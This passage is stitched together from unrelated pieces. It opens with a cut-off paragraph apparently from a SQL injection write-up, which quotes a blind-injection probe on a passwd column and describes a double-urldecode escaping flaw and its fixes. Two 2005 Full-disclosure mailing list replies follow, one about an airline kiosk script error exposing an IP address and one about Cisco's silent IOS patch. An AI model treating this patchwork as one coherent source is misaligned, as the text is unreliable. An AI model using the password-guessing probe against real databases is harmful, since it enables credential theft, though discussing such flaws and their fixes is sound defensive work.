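mid(passwd,1,1)='a'`, the boolean condition the PoC above iterates over, while
`PLAIN_QUOTE` is neutralised by the escaping step; `build_query_fixed` keeps the
probe as a harmless literal. Removing the second urldecode(), as the patch
section says, is the same fix; binding the value as a query parameter instead
of splicing it into the SQL text removes the ordering question altogether.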

Re: [Full-disclosure] Sensitive Information Disclosure Vulnerability in Kinetics Kiosk Product

2005-08-18 Thread Sam Evans
Jason,

Not that I disagree with you here, but I am not sure I understand why
you think that connecting to a host outside the private address ranges
is irresponsible by the company?

The connectivity from this Kiosk to the destination displayed could be one of:

The destination host only allows point to point connectivity,
controlled by a firewall or that the connectivity from this Kiosk is
through a VPN connection.

I also don't see the difference of using Internet Explorer versus any
other browser.  Script errors are script errors and will be
displayed regardless which browser they use unless specifically
disabled (as you mentioned).



On 8/18/05, Jason Coombs <[EMAIL PROTECTED]> wrote:
> The following script error message was noted being displayed this morning
> on an airline check-in kiosk manufactured by Kinetics USA.
>
> Vendor: Kinetics USA
> www.kineticsUSA.com
>
> Line: 107
> Char: 2
> Error: object expected
> Code: 0
> URL: http://151.151.10.46:64080/attract?time=1124376480&TransactionID=HNL_KIOSK09-050818044716
>
> Clearly, building a product such as a publicly-accessible airline passenger
> check-in kiosk using Internet Explorer and Windows is a very bad design
> decision if you care at all about preventing this sort of information
> disclosure. Even so, IE can and should be configured so as not to display
> such script errors. Furthermore, the use of an IP address that is outside of
> the RFC 1918 private subnet address range appears very irresponsible.
>
> Sincerely,
> Jason Coombs
> [EMAIL PROTECTED]

Re: [Full-disclosure] RE: Getting a clue at Cisco

2005-08-01 Thread Sam Evans
Just curious -- if the April patch fixed the vulnerability discussed, then that would mean (according to Cisco) that the vulnerability affected IPV6 and not IPV4, correct?
 
 
On 8/1/05, byte_jump <[EMAIL PROTECTED]> wrote:
> In my opinion, probably the grossest error made by Cisco in all of this was
> silently patching their IOS back in April. Anyone who's ever used Cisco's
> software knows that you can never run the latest release, unless you want
> things to break, and break badly. As a result, how many organizations were at
> the latest, patched IOS release as of BlackHat? Not many, I'd wager. If,
> however, Cisco had come clean and told everyone that there is a serious
> problem in their IOS and exploitation is being actively researched by Chinese
> hacker groups, you'd see a lot more uptake of that April IOS release. Instead,
> Cisco hangs their customers out to dry.
>
> Shameful, just shameful.